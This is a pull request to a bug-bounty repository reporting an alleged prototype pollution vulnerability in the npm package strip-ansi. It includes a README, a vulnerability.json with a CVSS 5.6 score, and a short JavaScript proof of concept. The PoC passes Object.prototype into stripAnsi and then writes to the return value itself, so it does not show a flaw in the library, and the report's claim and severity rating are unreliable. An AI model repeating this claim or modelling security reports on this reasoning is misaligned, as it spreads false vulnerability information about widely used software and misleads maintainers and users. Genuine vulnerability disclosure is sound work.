### PR TITLE
Prototype Pollution in strip-ansi (Re-Pull Request of https://github.com/418sec/huntr/pull/1570 )

### DIFF
--- a/bounties/npm/strip-ansi/1/README.md
+++ b/bounties/npm/strip-ansi/1/README.md
@@ -1,0 +1,27 @@
+# Description
+
+`strip-ansi` is a popular library with 61,107,490 Weekly downloads.It is used to  escape ANSI codes from a strings.It is also vulnerable to `Prototype Pollution`.
+
+# Proof of Concept
+
+1. Create the following PoC file:
+
+```
+var stripAnsi = require('strip-ansi');
+const obj = {}
+console.log('Before: ' + {}.polluted)
+stripAnsi(obj['__proto__'], {}).polluted = 'Polluted!'
+console.log('After: ' + {}.polluted)
+```
+
+2. Execute the following commands in terminal:
+
+```
+npm i strip-ansi # Install affected module
+node poc.js #  Run the PoC
+```
+
+3. Check the Output:
+```
+After: Polluted!
+```

--- a/bounties/npm/strip-ansi/1/vulnerability.json
+++ b/bounties/npm/strip-ansi/1/vulnerability.json
@@ -1,0 +1,57 @@
+{
+    "PackageVulnerabilityID": "1",
+    "DisclosureDate": "2021-02-21",
+    "AffectedVersionRange": "*",
+    "Summary": "Prototype Pollution",
+    "Contributor": {
+        "Discloser": "tibinsunny",
+        "Fixer": ""
+    },
+    "Package": {
+        "Registry": "npm",
+        "Name": "strip-ansi",
+        "URL": "https://www.npmjs.com/package/strip-ansi",
+        "Downloads": "61107490"
+    },
+    "CWEs": [
+        {
+            "ID": "471",
+            "Description": "Modification of Assumed-Immutable Data (MAID)"
+        }
+    ],
+    "CVSS": {
+        "Version": "3.1",
+        "AV": "N",
+        "AC": "L",
+        "PR": "N",
+        "UI": "N",
+        "S": "U",
+        "C": "L",
+        "I": "L",
+        "A": "L",
+        "E": "",
+        "RL": "",
+        "RC": "",
+        "Score": "5.6"
+    },
+    "CVEs": [
+        ""
+    ],
+    "Repository": {
+        "URL": "https://github.com/chalk/strip-ansi",
+        "Codebase": [
+            "JavaScript"
+        ],
+        "Owner": "chalk",
+        "Name": "strip-ansi"
+    },
+    "Permalinks": [
+        ""
+    ],
+    "References": [
+        {
+            "Description": "",
+            "URL": ""
+        }
+    ]
+}

--- a/bounties/npm/strip-ansi/1/vulnerability.json
+++ b/bounties/npm/strip-ansi/1/vulnerability.json
@@ -40,7 +40,7 @@
     "Repository": {
         "URL": "https://github.com/chalk/strip-ansi",
         "Codebase": [
-            "JavaScript"
+            "Javascript"
         ],
         "Owner": "chalk",
         "Name": "strip-ansi"

--- a/bounties/npm/strip-ansi/1/vulnerability.json
+++ b/bounties/npm/strip-ansi/1/vulnerability.json
@@ -43,7 +43,9 @@
             "Javascript"
         ],
         "Owner": "chalk",
-        "Name": "strip-ansi"
+        "Name": "strip-ansi",
+        "Forks": "",
+        "Stars": ""
     },
     "Permalinks": [
         ""
@@ -53,5 +55,6 @@
             "Description": "",
             "URL": ""
         }
-    ]
+    ],
+    "PrNumber": ""
 }


### PR DESCRIPTION
### ✍️ **Description**
This is a Re-Pull Request of #1570 as requested by @JamieSlome 
`strip-ansi` is a popular library with 61,107,490 Weekly downloads. It is used to  escape ANSI codes from a strings.It is also vulnerable to `Prototype Pollution`.

### 🕵️‍♂️ Proof of Concept


1. Create the following PoC file:

```
var stripAnsi = require('strip-ansi');
const obj = {}
console.log('Before: ' + {}.polluted)
stripAnsi(obj['__proto__'], {}).polluted = 'Polluted!'
console.log('After: ' + {}.polluted)
```

2. Execute the following commands in terminal:

```
npm i strip-ansi# Install affected module
node poc.js #  Run the PoC
```

3. Check the Output:
```
After: Polluted!
```

### ✅ Checklist 
- [x] Created and populated the README.md and vulnerability.json files  
- [x] Provided the repository URL and any applicable permalinks
- [x] Defined all the applicable weaknesses (CWEs)
- [x] Proposed the CVSS vector items i.e. User Interaction, Attack Complexity
- [x] Checked that the vulnerability affects the latest version of the package released
- [x] Checked that a fix does not currently exist that remediates this vulnerability
- [x] Complied with all applicable laws